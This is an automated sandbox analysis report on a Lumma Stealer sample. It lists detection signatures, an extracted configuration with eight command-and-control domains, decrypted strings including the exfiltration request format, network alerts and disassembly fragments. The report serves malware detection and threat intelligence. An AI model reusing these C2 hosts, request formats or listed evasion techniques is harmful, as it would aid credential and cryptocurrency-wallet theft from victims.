Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1531613
MD5:d28a43b3dbce6278477cc5696847850a
SHA1:9e50e7ced4ac3ceecca11afaa981e036cd4b84cf
SHA256:88131cc60d069d251c658a32f17720e443fe37de43eb4b4fbae6500d6e388b5f
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2096 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D28A43B3DBCE6278477CC5696847850A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["eaglepawnoy.store", "clearancek.site", "dissapoiznw.store", "studennotediw.store", "bathdoomgaz.store", "mobbipenju.store", "licendfilteo.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:06.439382+020020546531A Network Trojan was detected192.168.2.649711172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:06.439382+020020498361A Network Trojan was detected192.168.2.649711172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:04.191406+020020564771Domain Observed Used for C2 Detected192.168.2.6565381.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:03.908839+020020564711Domain Observed Used for C2 Detected192.168.2.6623641.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:04.053227+020020564811Domain Observed Used for C2 Detected192.168.2.6655351.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:04.041817+020020564831Domain Observed Used for C2 Detected192.168.2.6531591.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:04.227670+020020564731Domain Observed Used for C2 Detected192.168.2.6560781.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:03.926470+020020564851Domain Observed Used for C2 Detected192.168.2.6604711.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:04.216143+020020564751Domain Observed Used for C2 Detected192.168.2.6544971.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:04.167138+020020564791Domain Observed Used for C2 Detected192.168.2.6585341.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-11T13:45:05.369310+020028586661Domain Observed Used for C2 Detected192.168.2.64971023.192.247.89443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com:443/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.2096.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["eaglepawnoy.store", "clearancek.site", "dissapoiznw.store", "studennotediw.store", "bathdoomgaz.store", "mobbipenju.store", "licendfilteo.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}
    Multi AV Scanner detection for submitted file
    Source: file.exeVirustotal: Detection: 53%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00BD50FA
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B9D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B9D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_00BD63B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00BD99D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h0_2_00BD695B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_00B9FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00BA0EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00BD6094
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec ebx0_2_00BCF030
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00BA6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [edx]0_2_00B91000
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00BD4040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_00BBD1E1
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00BA42FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00BB2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], ax0_2_00BB2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_00BC23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_00BC23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_00BC23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00BC23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_00BC23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+14h]0_2_00BC23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_00B9A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_00BD64B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_00BAB410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_00BBE40C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_00BBC470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00BAD457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]0_2_00BD1440
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]0_2_00B98590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00BA6536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh0_2_00BD7520
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00BB9510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_00BBE66A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00BCB650
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_00BBD7AF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_00BD67EF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]0_2_00BD7710
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00BD5700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00BB28E9
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_00B949A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_00BD3920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_00BAD961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00BA1ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00BA1A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00B95A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00BD4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00BC0B80
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00BA1BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00BA3BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+000006B8h]0_2_00BADB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h0_2_00BADB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00BD9B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00BBAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], ax0_2_00BBAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00BD9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_00BD9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_00BBCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00BBCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_00BBCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh0_2_00BCFC20
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_00BB7C00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h0_2_00BBEC48
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00BD8D8A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_00BBDD29
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_00BBFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00BA6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_00B9BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00B96EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00BA1E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, ecx0_2_00BA4E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00BB5E70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00BB7E60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [ecx]0_2_00BBAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00BA6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], 0000h0_2_00BAFFDF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00B98FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00BD5FD6
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h0_2_00BD7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00BD7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00BCFF70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00BB9F62

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:60471 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:54497 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:65535 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:62364 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:56078 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:53159 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:58534 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:56538 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49710 -> 23.192.247.89:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.206.204:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Joe Sandbox ViewIP Address: 23.192.247.89 23.192.247.89
    Source: Joe Sandbox ViewIP Address: 172.67.206.204 172.67.206.204
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ww.youtube.com https://www.google.com https://sketchfab.com https://playT equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bathdoomgaz.store:443/apiT
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akam
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/apii
    Source: file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
